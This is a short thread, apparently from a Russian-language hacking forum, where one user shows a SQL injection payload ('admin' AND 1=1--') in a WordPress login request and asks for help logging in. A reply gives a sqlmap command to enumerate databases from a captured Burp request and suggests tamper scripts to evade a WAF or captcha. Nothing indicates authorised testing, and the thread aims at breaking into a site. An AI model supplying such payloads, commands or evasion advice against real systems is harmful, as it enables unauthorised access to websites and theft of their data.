Авторизоваться в WP

[qnit]

Доброго времени суток!Уважаемые форумчане!Столкнулся с проблемой...
Есть sql injection в поле авторизации ВП

Content-Type: multipart/form-data;

Content-Disposition: form-data; name="login"

admin' AND 1=1--
-----------------------------310860521324390303632791753596
Content-Disposition: form-data; name="pwd"

asdasdasd


MySQL AND boolean-based
AND time-based blind

Помогите авторизоавться

 

[Prokhorenco]

If you're trying to inject into a login form then try capturing the login request with burp and then save it to a file and run sqlmap through it.

1. capture request with burp and save it to a file
2. now run sqlmap through the file:

python3 sqlmap.py -r request.txt --dbs --random-agent

If you're having WAF or captcha problems then try using tamper agent scripts.